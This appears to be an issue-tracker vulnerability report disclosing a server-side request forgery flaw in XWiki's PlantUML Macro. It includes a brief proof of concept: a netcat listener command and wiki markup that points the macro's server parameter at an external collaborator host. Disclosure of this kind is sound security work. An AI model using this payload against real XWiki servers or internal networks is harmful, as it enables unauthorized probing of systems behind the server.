|
| Description: |
*Impact*
The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.
However, the application does not validate the supplied URL. An attacker can supply an internal IP address or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram.
h3.
* PoC *
1. Use an OAST service (like Burp Collaborator) or a local listener ({{{}nc -lvp 4444{}}}) to capture the interaction.
2. Create a wiki page with the following content:
{{{{{}plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"{}}}
@startuml
A -> B: SSRF Test
@enduml
{{{}/plantuml{}}}}}
!image-2025-11-26-06-54-50-628.png!
2. Save and View the page.
!image-2025-11-25-20-31-57-213.png!
3. The XWiki server initiates an HTTP connection to the specified target.
!image-2025-11-25-20-32-25-311.png!
h3.
* Attribution *
Reported by: Łukasz Rybak GitHub: [https://github.com/lukasz-rybak] |
|
